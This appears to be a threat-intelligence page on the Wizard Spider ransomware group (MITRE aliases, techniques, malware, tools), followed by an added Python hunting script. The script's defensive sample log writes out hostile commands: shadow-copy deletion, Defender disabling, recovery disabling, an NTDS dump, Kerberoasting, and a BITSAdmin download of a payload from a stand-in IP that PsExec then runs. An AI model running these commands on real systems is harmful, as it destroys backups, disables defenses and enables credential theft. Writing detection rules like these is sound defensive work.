Wizard Spider
Essential information
- Confidence: 100/100
- Published: 16/12/2025 19:39
- Modified: 04/05/2026 16:33
- Updated at: 04/05/2026 16:33
- Revoked: No
- Author / Source: The MITRE Corporation
- Resource level: —
- Primary motivation: —
- Related entities: 76 attack patterns (MITRE), 11 malware, 1 country, 101 indicators, 11 tools
Aliases
TEMP.MixMaster, Grim Spider, GOLD BLACKBURN, ITG23, Periwinkle Tempest, DEV-0193, FIN12, UNC1878
Description
Marking (TLP)
TLP:CLEAR Copyright 2015-2025, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.
External references
- CrowdStrike Wizard Spider October 2020
- Microsoft Threat Actor Naming July 2023
- CrowdStrike Grim Spider May 2019
- Secureworks Gold Blackburn Mar 2022
- Mandiant FIN12 Oct 2021
- FireEye KEGTAP SINGLEMALT October 2020
- Microsoft_PistachioTempest_Jan2024
- CrowdStrike Ryuk January 2019
- mitre-attack (G0102)
- DHS/CISA Ransomware Targeting Healthcare October 2020
- IBM X-Force ITG23 Oct 2021
- FireEye Ryuk and Trickbot January 2019
Related entities
Attack patterns, malware, vulnerabilities, indicators and other entities linked to this intrusion set.
Attack patterns (MITRE) (76)
- uses T1490 Inhibit System Recovery · MITRE
- uses T1112 Modify Registry · MITRE
- uses T1585.002 Email Accounts · MITRE
- uses T1562.001 Disable or Modify Tools · MITRE
- uses T1071.001 Web Protocols · MITRE
- uses T1222.001 Windows File and Directory Permissions Modification · MITRE
- uses T1003.003 NTDS · MITRE
- uses T1068 Exploitation for Privilege Escalation · MITRE
- uses T1218.011 Rundll32 · MITRE
- uses T1046 Network Service Discovery · MITRE
- uses T1135 Network Share Discovery · MITRE
Malware (11)
- Emotet · uses · Family · Source: The MITRE Corporation · Confidence 100
[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014,…
- Anchor · uses · Family · Source: The MITRE Corporation · Confidence 100
[Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor…
- GrimAgent · uses · Family · Source: The MITRE Corporation · Confidence 100
[GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group…
- Dyre · uses · Family · Source: The MITRE Corporation · Confidence 100
[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)
- Conti · uses · Family · Source: The MITRE Corporation · Confidence 100
[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those…
- Ryuk · uses · Family · Source: The MITRE Corporation · Confidence 100
[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk…
- Cobalt Strike · uses · Family · Source: The MITRE Corporation · Confidence 100
[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced…
- SystemBC · uses · Source: AlienVault · Confidence 100
[SystemBC](https://attack.mitre.org/software/S9001) is a malware family offered as a malware-as-a-service (MaaS) that is used to establish command and control and facilitate follow-on activity, including ransomware deployment.[SystemBC](https://attack.mitre.org/software/S9001) executes a variety…
- Bazar · uses · Family · Source: The MITRE Corporation · Confidence 100
[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies…
- Diavol · uses · Family · Source: The MITRE Corporation · Confidence 100
[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by…
- TSPY_TRICKLOAD (TrickBot) · uses · Source: The MITRE Corporation · Confidence 100
[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) was developed and initially used by…
Countries (1)
- United States of America · targets
Indicators (101)
- STIX indicator · 100/100 · Revoked · Valid until 02/02/2022 · Source: AlienVault
- STIX indicator · 100/100 · Revoked · Valid until 02/02/2022 · Source: AlienVault
- STIX indicator · 100/100 · Revoked · Valid until 02/02/2022 · Source: AlienVault
- STIX indicator · 100/100 · Revoked · Valid until 02/02/2022 · Source: AlienVault
- STIX indicator · 100/100 · Revoked · Win32:MalwareX-gen [Trj] · Valid until 02/02/2022 · Source: AlienVault
- STIX indicator · 100/100 · Revoked · Valid until 02/02/2022 · Source: AlienVault
- STIX indicator · 100/100 · Revoked · Valid until 02/02/2022 · Source: AlienVault
- STIX indicator · 100/100 · Revoked · Valid until 02/02/2022 · Source: AlienVault
Tool (11)
- Net · uses · Source: The MITRE Corporation · Confidence 100
The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft…
- Mimikatz · uses · Source: The MITRE Corporation · Confidence 100
[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of…
- AdFind · uses · Source: The MITRE Corporation · Confidence 100
[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation:…
- Rubeus · uses · Source: The MITRE Corporation · Confidence 100
[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP…
- Nltest · uses · Source: The MITRE Corporation · Confidence 100
[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)
- Empire · uses · Source: The MITRE Corporation · Confidence 100
[Empire](https://attack.mitre.org/software/S0363) is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents…
- BITSAdmin · uses · Source: The MITRE Corporation · Confidence 100
[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)
- Ping · uses · Source: The MITRE Corporation · Confidence 100
[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)
- LaZagne · uses · Source: The MITRE Corporation · Confidence 100
[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows…
- PsExec · uses · Source: The MITRE Corporation · Confidence 100
[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS…
- BloodHound · uses · Source: The MITRE Corporation · Confidence 100
[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT…
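The attack patterns and tools linked to this intrusion set are, for a defender, a hunting checklist: most of the tools above (Nltest, Net, AdFind, BITSAdmin, PsExec, Rubeus) and several of the listed techniques (T1490, T1562.001, T1003.003, T1218.011) leave their mark in process-creation telemetry. The Python below is an added illustration, not code from the MITRE entry or from any of the cited reports. It runs a small set of command-line hunting rules, keyed to the tools and ATT&CK IDs listed on this page, over a constructed process-creation export in a hypothetical `ts|host|user|parent|command_line` format, and then ranks hosts by how many distinct rules fired on them. The technique IDs and tool names come from the page; the concrete command-line shapes each rule looks for are representative examples chosen here and are not commands the page attributes to Wizard Spider; every host name, user and log line is made up.

```python
"""Command-line hunting rules keyed to the tools and techniques listed on this page.

Added illustration. ATT&CK IDs and tool names are from the page; the command-line
shapes, hosts, users and log lines below are constructed for this example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    label: str            # tool or ATT&CK technique, as listed on this page
    pattern: re.Pattern   # representative command-line shape (chosen here, not from the page)


RULES = (
    Rule("Nltest (S0359): DC / trust enumeration",
         re.compile(r"\bnltest(\.exe)?\b.*/(dclist|domain_trusts|dsgetdc)", re.I)),
    Rule("AdFind (S0552): AD query",
         re.compile(r"\badfind(\.exe)?\b.*\s-(f|sc)\s", re.I)),
    Rule("Net (S0039): domain group enumeration",
         re.compile(r"\bnet1?(\.exe)?\s+(group|localgroup)\b.*/domain\b", re.I)),
    Rule("BITSAdmin (S0190): file transfer",
         re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    Rule("PsExec (S0029): remote execution",
         re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
    Rule("Rubeus (S1071): Kerberos abuse",
         re.compile(r"\brubeus(\.exe)?\b.*\b(kerberoast|asreproast|asktgt|s4u|ptt)\b", re.I)),
    Rule("T1490: Inhibit System Recovery",
         re.compile(r"(\bvssadmin(\.exe)?\b.*delete\s+shadows)"
                    r"|(\bwbadmin(\.exe)?\b.*delete\s+catalog)"
                    r"|(\bbcdedit(\.exe)?\b.*recoveryenabled\s+no)", re.I)),
    Rule("T1562.001: Disable or Modify Tools",
         re.compile(r"Set-MpPreference\b.*-Disable\w+", re.I)),
    Rule("T1003.003: NTDS",
         re.compile(r"(\bntdsutil(\.exe)?\b.*\bifm\b)|ntds\.dit", re.I)),
    Rule("T1218.011: Rundll32 loading from a user-writable path",
         re.compile(r"\brundll32(\.exe)?\b.*\\(Users|ProgramData|Temp|AppData)\\", re.I)),
)

# Constructed process-creation export (hypothetical format): ts|host|user|parent|command_line
SAMPLE_EXPORT = r"""
2021-03-02T09:14:01Z|WS-014|CORP\jdoe|explorer.exe|"C:\Program Files\Mozilla Firefox\firefox.exe"
2021-03-02T09:20:33Z|WS-014|CORP\jdoe|cmd.exe|nltest /dclist:corp.local
2021-03-02T09:20:40Z|WS-014|CORP\jdoe|cmd.exe|nltest /domain_trusts /all_trusts
2021-03-02T09:22:05Z|WS-014|CORP\jdoe|cmd.exe|net group "Domain Admins" /domain
2021-03-02T09:25:17Z|WS-014|CORP\jdoe|cmd.exe|adfind.exe -f objectcategory=computer -csv name operatingSystem
2021-03-02T10:02:51Z|WS-014|CORP\jdoe|cmd.exe|rundll32.exe C:\Users\jdoe\AppData\Local\Temp\upd.dll,DllRegisterServer
2021-03-02T10:30:00Z|WS-014|CORP\jdoe|cmd.exe|Rubeus.exe kerberoast /outfile:C:\Users\jdoe\h.txt
2021-03-02T11:41:09Z|DC-01|CORP\svc-backup|cmd.exe|ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\x" q q
2021-03-03T02:05:10Z|WS-014|CORP\Administrator|cmd.exe|bitsadmin /transfer job /download /priority high http://192.0.2.10/u.bin C:\ProgramData\u.exe
2021-03-03T02:09:55Z|WS-014|CORP\Administrator|cmd.exe|psexec.exe \\FS-02 -accepteula -s -d C:\ProgramData\u.exe
2021-03-03T02:10:12Z|FS-02|CORP\Administrator|u.exe|vssadmin.exe delete shadows /all /quiet
2021-03-03T02:10:14Z|FS-02|CORP\Administrator|u.exe|powershell -nop -c Set-MpPreference -DisableRealtimeMonitoring $true
2021-03-03T02:12:00Z|FS-02|CORP\Administrator|u.exe|bcdedit /set {default} recoveryenabled No
2021-03-03T08:00:00Z|WS-022|CORP\asmith|cmd.exe|net user asmith
malformed line without separators
"""


def parse_record(line):
    """Split one export line into its fields; return None for malformed lines."""
    parts = [p.strip() for p in line.split("|", 4)]
    if len(parts) != 5:
        return None
    return dict(zip(("ts", "host", "user", "parent", "cmd"), parts))


def hunt(lines):
    """Return one (rule label, host, user, command) tuple per rule that fires on a record."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        for rule in RULES:
            if rule.pattern.search(rec["cmd"]):
                hits.append((rule.label, rec["host"], rec["user"], rec["cmd"]))
    return hits


def triage(hits):
    """Rank hosts by the number of distinct rules that fired on them.

    One nltest or net group call is routine admin noise; a host where discovery,
    Kerberos abuse, staging and remote execution all fire in one window is not.
    """
    per_host = defaultdict(set)
    for label, host, _user, _cmd in hits:
        per_host[host].add(label)
    return sorted(((h, sorted(ls)) for h, ls in per_host.items()),
                  key=lambda item: (-len(item[1]), item[0]))


if __name__ == "__main__":
    for host, labels in triage(hunt(SAMPLE_EXPORT.splitlines())):
        print(f"{host}: {len(labels)} distinct rules -> {', '.join(labels)}")
```

On the constructed input the workstation that ran the domain enumeration, the Rubeus kerberoast, the BITSAdmin download and the PsExec launch ranks first; the file server where shadow copies were deleted, Defender was switched off and recovery was disabled ranks second; the domain controller with the single ntdsutil IFM export ranks third. The per-rule matches are deliberately loose (the PsExec rule fires on the binary name alone, and Net, Nltest and BITSAdmin are all legitimate administrative tools), so in practice the value is in the co-occurrence on one host or one account inside a short window rather than in any single rule, and the host and user fields should be joined to authentication logs before anyone is paged.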